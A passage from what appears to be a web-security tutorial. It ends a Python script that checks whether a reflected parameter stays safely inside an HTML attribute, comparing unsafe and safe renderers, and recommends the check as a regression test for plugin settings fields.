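    """True when the reflected value survives intact as the attribute and
    nothing from it escaped into tag or text context."""
    value, stray, leaked = inspect(markup)
    return value == expected and not stray and leaked.strip() == ""


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        markup = renderer(PROBE)
        print(f"{label}: {markup}")
        print("  parser sees:", inspect(markup))
        print("  contained:", is_contained(markup, PROBE))
```

The is_contained check is the property a unit test for the fixed page should assert: feed every reflected parameter through the template and confirm the parsed attribute equals the input byte for byte with no stray attributes and no text outside the tag. The same check fails loudly on the unencoded render, which makes it a useful regression guard when a plugin adds new settings fields.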